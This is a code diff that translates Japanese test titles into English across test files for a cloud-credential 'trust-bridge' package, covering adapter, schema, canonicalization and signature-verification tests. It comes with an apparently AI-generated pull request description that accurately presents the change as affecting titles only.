@@ -64,7 +64,7 @@ describe("LocalStackCloudAdapter (#1122)", () => {
     expect(credential.traceLabel).toBe("offline-demo");
   });
 
-  it("context endpointUrl で adapter default endpoint を上書きすべき", async () => {
+  it("should override the adapter default endpoint with context endpointUrl", async () => {
     const adapter = new LocalStackCloudAdapter({ endpointUrl: "http://localhost:4566" });
 
     const credential = await adapter.exchange(makeIntent(), {
@@ -74,7 +74,7 @@ describe("LocalStackCloudAdapter (#1122)", () => {
     expect(credential.endpointUrl).toBe("http://127.0.0.1:4567");
   });
 
-  it("target provider が aws 以外なら provider-mismatch を投げるべき", async () => {
+  it("should throw provider-mismatch when the target provider is not aws", async () => {
     const adapter = new LocalStackCloudAdapter();
     await expect(
       adapter.exchange(
@@ -84,21 +84,21 @@ describe("LocalStackCloudAdapter (#1122)", () => {
     ).rejects.toMatchObject({ reason: "provider-mismatch" });
   });
 
-  it("localhost 以外の endpoint は拒否すべき", async () => {
+  it("should reject any endpoint other than localhost", async () => {
     const adapter = new LocalStackCloudAdapter();
     await expect(
       adapter.exchange(makeIntent(), { endpointUrl: "https://localstack.example.com" }),
     ).rejects.toMatchObject({ reason: "context-missing" });
   });
 
-  it("ttlSeconds は options.maxTtlSeconds を超えると ttl-exceeded-provider-limit を投げるべき", async () => {
+  it("should throw ttl-exceeded-provider-limit when ttlSeconds exceeds options.maxTtlSeconds", async () => {
     const adapter = new LocalStackCloudAdapter({ maxTtlSeconds: 300 });
     await expect(adapter.exchange(makeIntent(), {})).rejects.toMatchObject({
       reason: "ttl-exceeded-provider-limit",
     });
   });
 
-  it("ExchangeError として扱えるべき", async () => {
+  it("should be treatable as an ExchangeError", async () => {
     try {
       new LocalStackCloudAdapter({ endpointUrl: "ftp://localhost:4566" });
       throw new Error("expected throw");

--- a/packages/trust-bridge/test/mock-cloud-adapter.test.ts
+++ b/packages/trust-bridge/test/mock-cloud-adapter.test.ts
@@ -38,7 +38,7 @@ function makeIntent(overrides: Partial<CloudActionIntent> = {}): VerifiedCloudAc
 }
 
 describe("MockCloudAdapter (#1122)", () => {
-  it("実 provider API を呼ばず擬似 credential と成功 signal を返すべき", async () => {
+  it("should return a fake credential and success signal without calling a real provider API", async () => {
     const adapter = new MockCloudAdapter({
       now: () => new Date("2026-05-15T19:00:00.000Z"),
     });
@@ -63,27 +63,27 @@ describe("MockCloudAdapter (#1122)", () => {
     });
   });
 
-  it("target provider が adapter provider と違う場合は provider-mismatch を投げるべき", async () => {
+  it("should throw provider-mismatch when the target provider differs from the adapter provider", async () => {
     const adapter = new MockCloudAdapter({ provider: "gcp" });
     await expect(adapter.exchange(makeIntent(), {})).rejects.toMatchObject({
       reason: "provider-mismatch",
     });
   });
 
-  it("ttlSeconds は options.maxTtlSeconds を超えると ttl-exceeded-provider-limit を投げるべき", async () => {
+  it("should throw ttl-exceeded-provider-limit when ttlSeconds exceeds options.maxTtlSeconds", async () => {
     const adapter = new MockCloudAdapter({ maxTtlSeconds: 300 });
     await expect(adapter.exchange(makeIntent(), {})).rejects.toMatchObject({
       reason: "ttl-exceeded-provider-limit",
     });
   });
 
-  it("context の traceLabel を signal に引き継ぐべき", async () => {
+  it("should propagate the context traceLabel into the signal", async () => {
     const adapter = new MockCloudAdapter();
     const credential = await adapter.exchange(makeIntent(), { traceLabel: "offline-demo" });
     expect(credential.deploymentSignal.traceLabel).toBe("offline-demo");
   });
 
-  it("ExchangeError として扱えるべき", async () => {
+  it("should be treatable as an ExchangeError", async () => {
     const adapter = new MockCloudAdapter({ provider: "azure" });
     try {
       await adapter.exchange(makeIntent(), {});

--- a/packages/trust-bridge/test/schema.test.ts
+++ b/packages/trust-bridge/test/schema.test.ts
@@ -36,7 +36,7 @@ function validIntent(overrides: Partial<CloudActionIntent> = {}): CloudActionInt
 }
 
 describe("CloudActionIntentSchema (#795 Phase 1)", () => {
-  it("正常な intent は parse 成功して original を返すべき", () => {
+  it("should parse a valid intent successfully and return the original", () => {
     const result = parseCloudActionIntent(validIntent());
     expect(result.ok).toBe(true);
     if (result.ok) {
@@ -45,7 +45,7 @@ describe("CloudActionIntentSchema (#795 Phase 1)", () => {
     }
   });
 
-  it("未知の version は reject すべき (= 将来の v2 で discriminate するため)", () => {
+  it("should reject an unknown version (= so we can discriminate a future v2)", () => {
     const bad = { ...validIntent(), version: "tenkacloud.cloud-action-intent.v2" };
     const result = parseCloudActionIntent(bad);
     expect(result.ok).toBe(false);
@@ -54,7 +54,7 @@ describe("CloudActionIntentSchema (#795 Phase 1)", () => {
     }
   });
 
-  it("provider が enum 外なら reject すべき", () => {
+  it("should reject a provider outside of the enum", () => {
     const bad = validIntent();
     const result = parseCloudActionIntent({
       ...bad,
@@ -63,7 +63,7 @@ describe("CloudActionIntentSchema (#795 Phase 1)", () => {
     expect(result.ok).toBe(false);
   });
 
-  it("ttlSeconds が 0 以下なら reject すべき (= 即失効 intent の禁止)", () => {
+  it("should reject ttlSeconds of 0 or less (= forbid intents that expire instantly)", () => {
     const bad = validIntent();
     const result = parseCloudActionIntent({
       ...bad,
@@ -72,7 +72,7 @@ describe("CloudActionIntentSchema (#795 Phase 1)", () => {
     expect(result.ok).toBe(false);
   });
 
-  it("ttlSeconds が 3600 を超えたら reject すべき (= short-TTL 原則の機械強制)", () => {
+  it("should reject ttlSeconds greater than 3600 (= machine-enforced short-TTL principle)", () => {
     const bad = validIntent();
     const result = parseCloudActionIntent({
       ...bad,
@@ -81,7 +81,7 @@ describe("CloudActionIntentSchema (#795 Phase 1)", () => {
     expect(result.ok).toBe(false);
   });
 
-  it("expiresAt が ISO datetime 形式でなければ reject すべき", () => {
+  it("should reject expiresAt that is not in ISO datetime format", () => {
     const bad = validIntent();
     const result = parseCloudActionIntent({
       ...bad,
@@ -90,7 +90,7 @@ describe("CloudActionIntentSchema (#795 Phase 1)", () => {
     expect(result.ok).toBe(false);
   });
 
-  it("schema 外の property があれば reject すべき (= strict mode で confused deputy 防御)", () => {
+  it("should reject any property outside the schema (= strict mode defends against confused deputy)", () => {
     const result = parseCloudActionIntent({
       ...validIntent(),
       somethingExtra: "should-be-rejected",
@@ -100,26 +100,26 @@ describe("CloudActionIntentSchema (#795 Phase 1)", () => {
 });
 
 describe("canonicalize (#795 Phase 1)", () => {
-  it("同じ object literal は順序が違っても同じ byte に正規化されるべき", () => {
+  it("should canonicalize the same object literal to identical bytes regardless of key order", () => {
     const a = canonicalize({ b: 1, a: 2 });
     const b = canonicalize({ a: 2, b: 1 });
     expect(a).toBe(b);
     expect(a).toBe('{"a":2,"b":1}');
   });
 
-  it("array の要素順は preserve されるべき (= 意図的順序を破壊しない)", () => {
+  it("should preserve array element order (= do not destroy intentional ordering)", () => {
     expect(canonicalize([3, 1, 2])).toBe("[3,1,2]");
   });
 
-  it("undefined property は drop されるべき (= optional field の有無で hash 不変)", () => {
+  it("should drop undefined properties (= hash stays stable across presence of optional fields)", () => {
     expect(canonicalize({ a: 1, b: undefined })).toBe('{"a":1}');
   });
 
-  it("null は preserve されるべき (= explicit null と undefined の意味差を保つ)", () => {
+  it("should preserve null (= keep the semantic difference between explicit null and undefined)", () => {
     expect(canonicalize({ a: null })).toBe('{"a":null}');
   });
 
-  it("nested object も再帰的に sort されるべき", () => {
+  it("should sort nested objects recursively", () => {
     const a = canonicalize({ outer: { z: 1, a: 2 }, alpha: 1 });
     const b = canonicalize({ alpha: 1, outer: { a: 2, z: 1 } });
     expect(a).toBe(b);

--- a/packages/trust-bridge/test/verify.test.ts
+++ b/packages/trust-bridge/test/verify.test.ts
@@ -26,7 +26,7 @@ function intent(overrides: Partial<CloudActionIntent["constraints"]> = {}): Clou
 }
 
 describe("verifyIntent (#795 Phase 1)", () => {
-  it("有効 token + future expiresAt + nonce 未使用なら ok=true でブランド型を返すべき", async () => {
+  it("should return ok=true with a branded type for a valid token, future expiresAt, and unused nonce", async () => {
     const secret = randomBytes(32);
     const token = signIntent(intent(), { secret });
     const result = await verifyIntent(token, {
@@ -39,7 +39,7 @@ describe("verifyIntent (#795 Phase 1)", () => {
     }
   });
 
-  it("expiresAt が now より過去なら expired を返すべき", async () => {
+  it("should return expired when expiresAt is in the past relative to now", async () => {
     const secret = randomBytes(32);
     const token = signIntent(intent({ expiresAt: "2026-05-15T10:00:00.000Z" }), { secret });
     const result = await verifyIntent(token, {
@@ -50,7 +50,7 @@ describe("verifyIntent (#795 Phase 1)", () => {
     if (!result.ok) expect(result.reason).toBe("expired");
   });
 
-  it("notBefore が now より未来なら not-yet-valid を返すべき", async () => {
+  it("should return not-yet-valid when notBefore is in the future relative to now", async () => {
     const secret = randomBytes(32);
     const token = signIntent(
       intent({
@@ -67,7 +67,7 @@ describe("verifyIntent (#795 Phase 1)", () => {
     if (!result.ok) expect(result.reason).toBe("not-yet-valid");
   });
 
-  it("nonce store が replay を返すと nonce-replay を返すべき (= replay attack 防御)", async () => {
+  it("should return nonce-replay when the nonce store reports replay (= defends against replay attacks)", async () => {
     const secret = randomBytes(32);
     const token = signIntent(intent(), { secret });
     const replayStore: NonceStore = {
@@ -82,7 +82,7 @@ describe("verifyIntent (#795 Phase 1)", () => {
     if (!result.ok) expect(result.reason).toBe("nonce-replay");
   });
 
-  it("nonce store が accepted を返すと verify は通るべき", async () => {
+  it("should pass verify when the nonce store reports accepted", async () => {
     const secret = randomBytes(32);
     const token = signIntent(intent(), { secret });
     let recorded = 0;
@@ -101,7 +101,7 @@ describe("verifyIntent (#795 Phase 1)", () => {
     expect(recorded).toBe(1);
   });
 
-  it("schema 違反な payload (= 不要 property 混入) は schema-invalid を返すべき", async () => {
+  it("should return schema-invalid for a payload that violates the schema (= contains unwanted properties)", async () => {
     const secret = randomBytes(32);
     // 直接 invalid payload を sign したいので、 schema を bypass して任意 object を渡す。
     const badPayload = {
@@ -120,7 +120,7 @@ describe("verifyIntent (#795 Phase 1)", () => {
     }
   });
 
-  it("signature が改ざんされていたら jws-signature-mismatch を返すべき", async () => {
+  it("should return jws-signature-mismatch when the signature has been tampered with", async () => {
     const signer = randomBytes(32);
     const verifier = randomBytes(32);
     const token = signIntent(intent(), { secret: signer });


### PR DESCRIPTION
## Summary

- Bulk-translate `describe()` / `it()` / `test()` titles in 189 test files across every workspace from the Japanese `〜すべき` pattern to the English `should ...` pattern.
- Pairs with #1174 (CLAUDE.md / AGENTS.md / CONTRIBUTING.md translation).
- 1634 lines changed in 189 files (= title-only edit; all assertions / fixtures / imports / logic preserved).

## Test plan

- `make test` (all workspaces pass)
- `make before-commit` (lint / typecheck / test / validate-problems / template ASCII / template security / CFn refs / audit-deps / cdk synth all OK)
- Sample diff inspection

## Regression analysis

- **No runtime change**: titles are descriptive labels for Vitest reporters. The runner does not parse natural language.
- **All assertions / setup / fixtures preserved verbatim** — only string literal arguments to `describe` / `it` / `test` were touched.
- **Japanese strings used INSIDE test bodies are preserved**: those assert against Japanese UI strings under test (i18n tests, etc.) and must remain Japanese to match the app's actual behavior.
- **Technical terms / tag suffixes preserved**: `Cognito`, `CloudFront`, `Hono`, `(#1006)`, `(ADR-012)`, `(Phase 3.B)`, etc.
- **A small number of `べき` characters remain inside `// ...` or `/* ... */` code comments** — comments may contain Japanese; only titles were in scope.
- **Vitest behavior unchanged**: same test files, same test count, same pass / fail.

## Physical impact

- **CREATE**: none.
- **UPDATE**: 189 `.test.ts(x)` files across `apps/*` / `infrastructure/test/*` / `packages/trust-bridge/test/*`. Title-only changes (1634 lines).
- **REPLACE / DELETE / NO-OP**: none. No AWS resources / CFn / IAM / runtime / UI behavior touched.
- **CI / CD impact**: none — same tests run, same reporter behavior with English titles.

🤖 Generated with [Claude Code](https://claude.com/claude-code)